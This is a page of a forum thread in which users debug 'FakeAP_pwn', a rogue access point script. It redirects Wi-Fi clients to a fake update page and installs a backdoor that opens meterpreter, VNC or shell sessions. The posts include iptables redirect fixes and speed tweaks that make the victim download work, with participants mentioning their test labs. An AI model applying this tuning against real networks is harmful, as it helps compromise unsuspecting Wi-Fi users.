Page 9 of 19 FirstFirst ... 7891011 ... LastLast
Results 81 to 90 of 185

Thread: [Script] [Video] FakeAP_pwn (v0.2.1)

  1. #81
    Just burned his ISO
    Join Date
    Jul 2010
    Posts
    5

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    W000t! Finally got this damn thing figured out.. working on both my xp and my win7 x64 machines. The problem with the redirect is that script is telling the iptables to redirect port 80-->10000 for sslstrip, and also to redirect port 80-->10.0.0.1, which obviously wont work. So, if you want the redirect to work, just # out line 547 (iptables -t nat -A PREROUTING... --to-port 10000)

    Let me know if this works for any of you guys-

  2. #82
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Quote Originally Posted by teaker View Post
    Just downloaded r10.
    I've had trouble connecting/obtaining an IP address with each release until I change:
    airbase-ng -P -C 0 <--- to a higher number (ie. 50 or 100). After that I am connecting fine.

    However, once I am connected, metasploit isn't doing anything. In other words, I can connect and surf the internet, but I am never redirected/exploited. Any ideas?
    The -C is only used when you enabled "respond2All". Which be default it doesn't! So I dunno why that is the case for you!

    Metasploit isn't meant to do anything then anyway!
    DNSSpoof on the other hand...is meant to do something - redirect all the traffic!
    Not sure why its not doing it - I need to be at home in my lab to test it all out (been coding it without testing it)


    Quote Originally Posted by slowz3r View Post
    Frustrated with this whole it not redirecting thing :P haha oh well

    How long is it taking some of you for VNC to upload to the target? Even after changing the MTU value it seems like it isnt uploading at all,
    Your not the only one frustrated, I've been away travelling and I left my WiFi cards at home! )= So I've been trusting other people to test stuff out (as I dont have my lab)...
    I don't think im going to release another update for a bit now. I wanna get home and sort it all out. (=

    Could you tell me:

    • Your WiFi card + driver
    • Your kernel version
    • Signal strength of the AP
    • The time it takes to ping the AP
    • The time it takes to ping google.com when connect to the fakeAP
    • send me the output of: bash fakeAP_pwn.sh -V > output.txt
    Last edited by g0tmi1k; 07-08-2010 at 07:20 AM.
    Have you...g0tmi1k?

  3. #83
    Member
    Join Date
    Mar 2010
    Location
    Somewhere in CA
    Posts
    98

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Quote Originally Posted by teaker View Post
    W000t! Finally got this damn thing figured out.. working on both my xp and my win7 x64 machines. The problem with the redirect is that script is telling the iptables to redirect port 80-->10000 for sslstrip, and also to redirect port 80-->10.0.0.1, which obviously wont work. So, if you want the redirect to work, just # out line 547 (iptables -t nat -A PREROUTING... --to-port 10000)

    Let me know if this works for any of you guys-
    This guy Wins!, successful Redirect!

    Quote Originally Posted by g0tmi1k
    Your not the only one frustrated, I've been away travelling and I left my WiFi cards at home! )= So I've been trusting other people to test stuff out (as I dont have my lab)...
    I don't think im going to release another update for a bit now. I wanna get home and sort it all out. (=

    Could you tell me:

    * Your WiFi card + driver
    * Your kernel version
    * Signal strength of the AP
    * The time it takes to ping the AP
    * The time it takes to ping google.com when connect to the fakeAP
    * send me the output of: bash fakeAP_pwn.sh -V > output.txt

    Card+Driver: Linksys WUSB54G v.4, rtl2570
    Kernel: 2.6.34
    Signal Strength: 100%
    Ping AP: 7ms
    Ping google: 100ms
    Output: Pastebin

    Extremely slow MTU is at 1800, and it really shows when its uploading the payload to the target, have yet to get a VNC connection or a shell. But we seem to be getting closer, but speed is an issue
    Last edited by slowz3r; 07-08-2010 at 08:08 AM.

  4. #84
    Senior Member
    Join Date
    Jun 2007
    Location
    UK
    Posts
    175

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    RC10 progress report
    When running script as is
    client connects OK - browser has internet connection - does not get our update page - enter 10.0.0.1 and update page OK
    Run the download & VNC works (very slow) - meterpreter session opens.

    Re-Run the script
    transparent=false - payload=sbd -mtu=1800
    browser now shows the update page - downloads update & it runs (very slow client would not wait this long if live)
    Gets meterpreter session & shell OK

    It's getting there now just the problem that the client gets the internet before the our update page and not forced to download first.
    The speed problem did not seem this bad in version 2 and I am running exactley the same test lab if that gives you a clue.
    many thanks

    Just spotter the post by teaker "# out line 547 (iptables -t nat -A PREROUTING... --to-port 10000)"
    This works sorry did not spot earlier. Now gives update page first then internet after running download - Great
    Last edited by parrotface; 07-08-2010 at 08:17 AM. Reason: found earlier post by teaker

  5. #85
    Member
    Join Date
    Mar 2010
    Location
    Somewhere in CA
    Posts
    98

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Quote Originally Posted by parrotface View Post
    RC10 progress report
    When running script as is
    client connects OK - browser has internet connection - does not get our update page - enter 10.0.0.1 and update page OK
    Run the download & VNC works (very slow) - meterpreter session opens.

    Re-Run the script
    transparent=false - payload=sbd -mtu=1800
    browser now shows the update page - downloads update & it runs (very slow client would not wait this long if live)
    Gets meterpreter session & shell OK

    It's getting there now just the problem that the client gets the internet before the our update page and not forced to download first.
    The speed problem did not seem this bad in version 2 and I am running exactley the same test lab if that gives you a clue.
    many thanks
    How longs it take for the payload to upload and for a VNC session or a shell to spawn?

    longest ive waited for it to upload backdoor.exe was around 4-5 minutes after that I exit
    Last edited by slowz3r; 07-08-2010 at 08:19 AM.

  6. #86
    Junior Member
    Join Date
    Jan 2010
    Posts
    36

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Awesome script

    Few quick things i noticed ..

    line 251, the sleep timer needs to be incresed just a tad, mine kept failing out at 5 seconds so i changed it to 10. That could be because im in a VM tho.

    line 261, you might want to change to macchanger -A, as i noticed that a totally random mac would fail sometimes when boxes tried to connect


    The last thing really cant be fixed here but its totally worth noting. airbase-ng has "atleast in my opnion" horrible beacons, meaning any windows 7 box can not connect to your fakeAP. It also tends to spew out a TON of beacons with a null ssid so for instance if you look in windows zeroconf "or whatever the hell they call it" youll always see a "Other Network".

    I was kicking around a way to solve this last night and one of the ideas that i came up with was using a combo of aireplay-ng and packetforge-ng to grep out a beacon from a pcap "Or you could make your own " then having an option in airbase-ng to replay your custom beacon.

    Anyways great script and thanks again

  7. #87
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Quote Originally Posted by teaker View Post
    W000t! Finally got this damn thing figured out.. working on both my xp and my win7 x64 machines. The problem with the redirect is that script is telling the iptables to redirect port 80-->10000 for sslstrip, and also to redirect port 80-->10.0.0.1, which obviously wont work. So, if you want the redirect to work, just # out line 547 (iptables -t nat -A PREROUTING... --to-port 10000)

    Let me know if this works for any of you guys-
    You posted this as I was typing my reply... =P
    Thanks for the fix!
    I'll edit it for the next release (also got the self updater working too!)
    and look into getting SSLStrip to work as well as dnsspoof...

    Quote Originally Posted by slowz3r View Post
    This guy Wins!, successful Redirect!




    Card+Driver: Linksys WUSB54G v.4, rtl2570
    Kernel: 2.6.34
    Signal Strength: 100%
    Ping AP: 7ms
    Ping google: 100ms
    Output: Pastebin

    Extremely slow MTU is at 1800, and it really shows when its uploading the payload to the target, have yet to get a VNC connection or a shell. But we seem to be getting closer, but speed is an issue
    Glad to know it works for someone else!
    Thanks for the info too! (=

    Quote Originally Posted by parrotface View Post
    RC10 progress report
    When running script as is
    client connects OK - browser has internet connection - does not get our update page - enter 10.0.0.1 and update page OK
    Run the download & VNC works (very slow) - meterpreter session opens.

    Re-Run the script
    transparent=false - payload=sbd -mtu=1800
    browser now shows the update page - downloads update & it runs (very slow client would not wait this long if live)
    Gets meterpreter session & shell OK

    It's getting there now just the problem that the client gets the internet before the our update page and not forced to download first.
    The speed problem did not seem this bad in version 2 and I am running exactley the same test lab if that gives you a clue.
    many thanks

    Just spotter the post by teaker "# out line 547 (iptables -t nat -A PREROUTING... --to-port 10000)"
    This works sorry did not spot earlier. Now gives update page first then internet after running download - Great
    Glad that its now working for you!
    Just gotta get the speed up for you...

    Could you also tell me:
    * Your WiFi card + driver
    * Your kernel version
    * Signal strength of the AP
    * The time it takes to ping the AP
    * The time it takes to ping google.com when connect to the fakeAP
    * send me the output of: bash fakeAP_pwn.sh -V > output.txt



    Quote Originally Posted by slowz3r View Post
    How longs it take for the payload to upload and for a VNC session or a shell to spawn?

    longest ive waited for it to upload backdoor.exe was around 4-5 minutes after that I exit
    It should be less than 20 seconds - and that's on a bad day!
    *saying that - it depends on the signal strength*
    Im not 100% sure why its so slow - but I've got a couple of ideas to try (I'll let you know!)
    Have you...g0tmi1k?

  8. #88
    Senior Member
    Join Date
    Jun 2007
    Location
    UK
    Posts
    175

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Quote Originally Posted by slowz3r View Post
    How longs it take for the payload to upload and for a VNC session or a shell to spawn?

    longest ive waited for it to upload backdoor.exe was around 4-5 minutes after that I exit
    Mine takes about 2 mins not actualy timed it.

    Further testing has shown another problem which I have had previously.
    If I start my attack machine without eth0 connected to my network it fails because eth0 does not have a IP address.
    Now before running script "ifconfig eth0 192.168.3.101 netmask 255.255.255.0 broadcast 192.168.3.255" the script now runs.
    I guess this is a fairly simple fix with an if statement No IP then ifconfig etc etc.
    After downloading and running the update mine took approx 90 seconds to get a meterpreter>

  9. #89
    Senior Member
    Join Date
    Jun 2007
    Location
    UK
    Posts
    175

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Quote Originally Posted by g0tmi1k View Post


    Glad to know it works for someone else!
    Thanks for the info too! (=


    Glad that its now working for you!
    Just gotta get the speed up for you...

    Could you also tell me:
    * Your WiFi card + driver
    * Your kernel version
    * Signal strength of the AP
    * The time it takes to ping the AP
    * The time it takes to ping google.com when connect to the fakeAP
    * send me the output of: bash fakeAP_pwn.sh -V > output.txt
    Wifi card = Atheros built into eeepc - driver ath5k
    client XP SP2 HP laptop shows max signal strength
    kernel version 2.6.30.9
    ping 10.0.0.1 17ms, 7ms, 18ms, 3ms, average 11ms re- pings average 38ms, 28ms, 3ms
    ping google.co.uk 83, 47, 50, 63 average 60ms re-ping average 81, 94, 59ms
    How do I bash fakeAP_pwn.sh -V > output.txt? I ran bash fakeAP_pwn.sh -V > output.txt something happened when the script ran but can't find any file output.txt
    thanks

  10. #90
    Member joker5bb's Avatar
    Join Date
    Feb 2010
    Posts
    166

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    it is running slow because of airbase-ng, its just broken

Page 9 of 19 FirstFirst ... 7891011 ... LastLast

Similar Threads

  1. Replies: 6
    Last Post: 10-08-2010, 11:40 PM
  2. Script help
    By isdigit in forum OLD Newbie Area
    Replies: 2
    Last Post: 08-21-2009, 02:35 AM
  3. Video: Nmap Video Tutorial 2: Port Scan Boogaloo
    By Irongeek in forum OLD Tutorials and Guides
    Replies: 0
    Last Post: 05-30-2008, 08:07 PM
  4. Video: Nmap Video Tutorial 2: Port Scan Boogaloo
    By Irongeek in forum OLD BT1, Whax and Auditor Videos
    Replies: 0
    Last Post: 05-30-2008, 08:07 PM
  5. LZM Script/lzm2dir script
    By unseen in forum OLD Tutorials and Guides
    Replies: 2
    Last Post: 11-29-2007, 02:51 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •